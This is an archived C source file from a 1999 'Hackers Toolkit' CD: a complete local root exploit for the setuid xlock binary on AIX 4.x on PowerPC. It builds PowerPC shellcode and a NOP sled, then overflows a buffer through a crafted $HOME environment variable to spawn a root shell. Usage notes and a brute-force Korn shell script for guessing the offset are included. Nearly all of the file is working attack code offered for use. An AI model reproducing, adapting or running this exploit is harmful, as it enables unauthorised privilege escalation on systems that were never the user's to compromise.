home *** CD-ROM | disk | FTP | other *** search
/ Hackers Toolkit v2.0 / Hackers_Toolkit_v2.0.iso / HTML / archive / Unix / c-src / aix_xlock.c < prev    next >
C/C++ Source or Header  |  1999-11-04  |  3KB  |  111 lines

  1. /*
  2.  *
  3.  *   /usr/bin/X11/xlock exploit (kinda' coded) by BeastMaster V    
  4.  * 
  5.  *   CREDITS: this code is simply a modified version of an exploit
  6.  *   posted by Georgi Guninski (guninski@hotmail.com)
  7.  *
  8.  *   This will give a #rootshell# by overwriting a buffer
  9.  *   via the $HOME environment variable in 'xlock'
  10.  *   This exploit is designed for AIX 4.x on PPC platform.    
  11.  *
  12.  *
  13.  *   USAGE: 
  14.  *           $ cc -o foo -g aix_xlock.c
  15.  *          $ ./foo 3200
  16.  *            #
  17.  *
  18.  *   HINT: Try giving ranges from 3100 through 3400
  19.  *   (If these ranges don't work, then run the brute
  20.  *    korn shell script provided after the exploit)
  21.  *
  22.  *   DISCLAIMER: use this program in a responsible manner.
  23.  *
  24.  *   --> don't forget to visit http://www.rootshell.com
  25.  *   --> for more goodies :-)
  26.  *
  27.  */
  28.  
  29. #include <stdio.h>
  30. #include <stdlib.h>
  31. #include <string.h>
  32.  
  33. extern int execv();
  34.  
  35. #define MAXBUF 600 
  36.  
  37. unsigned int code[]={
  38.         0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
  39.         0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
  40.         0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
  41.         0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
  42.         0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
  43.         0x7c0903a6 , 0x4e800420, 0x0
  44. };
  45.  
  46. char *createvar(char *name,char *value)
  47. {
  48.     char *c;
  49.     int l;
  50.  
  51.     l=strlen(name)+strlen(value)+4;
  52.     if (! (c=malloc(l))) {perror("error allocating");exit(2);};
  53.     strcpy(c,name);
  54.     strcat(c,"=");
  55.     strcat(c,value);
  56.     putenv(c);
  57.     return c;
  58. }
  59.  
  60. main(int argc,char **argv,char **env)
  61. {
  62.     unsigned int buf[MAXBUF],frame[MAXBUF],i,nop,toc,eco,*pt;
  63.     int min=200, max=300;
  64.     unsigned int return_address;
  65.     char *newenv[8];
  66.     char *args[4];
  67.     int offset=3200;
  68.  
  69.     if (argc==2) offset = atoi(argv[1]);
  70.  
  71.     pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt;
  72.  
  73.     *((unsigned short *)code+9)=(unsigned short) (toc & 0x0000ffff);
  74.     *((unsigned short *)code+7)=(unsigned short) ((toc >> 16) & 0x0000ffff);
  75.     *((unsigned short *)code+15)=(unsigned short) (eco & 0x0000ffff);
  76.     *((unsigned short *)code+13)=(unsigned short) ((eco >> 16) & 0x0000ffff);
  77.  
  78.     return_address=(unsigned)&buf[0]+offset;
  79.  
  80.     for(nop=0;nop<min;nop++) buf[nop]=0x4ffffb82;
  81.     strcpy((char*)&buf[nop],(char*)&code);
  82.     i=nop+strlen( (char*) &code)/4-1;
  83.  
  84.     for(i=0;i<max-1;i++) frame[i]=return_address;
  85.     frame[i]=0;
  86.  
  87.     newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
  88.     newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
  89.     newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
  90.     newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
  91.     newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
  92.     newenv[5]=createvar("HOME",(char*)&frame[0]);
  93.  
  94.     args[0]="xlock";
  95.     execve("/usr/bin/X11/xlock",args,newenv);
  96.     perror("Error executing execve \n");
  97.  
  98. }
  99.  
  100. ----------- Brute Korn Shell Script -----------
  101. #!/bin/ksh
  102. L=3000
  103. O=10
  104. while [ $L -lt 12000 ]
  105. do
  106. echo $L
  107. L=`expr $L + $O`
  108. ./foo $L
  109. done
  110. ----------- End Brute Shell Script ------------
  111.